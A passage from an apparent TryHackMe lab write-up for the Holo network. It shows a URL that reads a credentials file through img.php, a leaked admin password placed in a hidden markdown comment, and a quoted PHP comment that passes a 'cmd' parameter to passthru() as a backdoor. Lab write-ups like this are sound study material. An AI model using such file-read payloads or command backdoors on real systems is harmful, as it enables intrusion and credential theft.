zinzloun/THM_WriteUP/README.md

     http://dev.holo.live/img.php?file=/var/www/admin/supersecretdir/creds.txt

 The file is downloaded as img.php and inside we can filnd some credentials.

+[//]: # (admin:DBManagerLogin!)

 I used the credentials to access the admin app.
 Once logged in we can see that there is nothing we can do in pratical, I mean no way to upload o inject a webshell.
 Again inspecting the souce of the page I found an interesting comment:

     <!--                   //if ($_GET['cmd'] === NULL) { echo passthru("cat /tmp/Views.txt"); } else { echo passthru($_GET['cmd']);} -->